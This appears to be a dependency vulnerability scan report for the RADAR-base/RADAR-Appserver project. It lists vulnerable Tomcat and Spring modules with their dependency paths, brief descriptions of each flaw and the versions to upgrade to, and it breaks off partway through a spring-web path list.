Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-websocket@11.0.21 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
Overview
org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.
Affected versions of this package are vulnerable to Improper Authorization in the processing of security constraints when multiple method constraints define an HTTP method for the same extension. An attacker can gain unauthorized access to protected resources by crafting requests that exploit the improper application of these constraints.
Remediation
Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.118, 10.1.55, 11.0.22 or higher.
References
medium severity
new
- Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
- Introduced through: org.apache.tomcat.embed:tomcat-embed-core@10.1.52 and org.springframework.boot:spring-boot-starter-web@4.1.0-RC1
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.apache.tomcat.embed:tomcat-embed-core@10.1.52Remediation: Upgrade to org.apache.tomcat.embed:tomcat-embed-core@10.1.55.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-websocket@11.0.21 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
Overview
org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.
Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity in the LockOutRealm function. An attacker can bypass account lockout protections by submitting usernames with different letter casing.
Remediation
Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.118, 10.1.55, 11.0.22 or higher.
References
medium severity
- Vulnerable module: org.springframework:spring-expression
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-expression@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-health@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
Overview
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted SpEL expression.
Remediation
Upgrade org.springframework:spring-expression to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.
References
medium severity
- Vulnerable module: org.springframework:spring-web
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
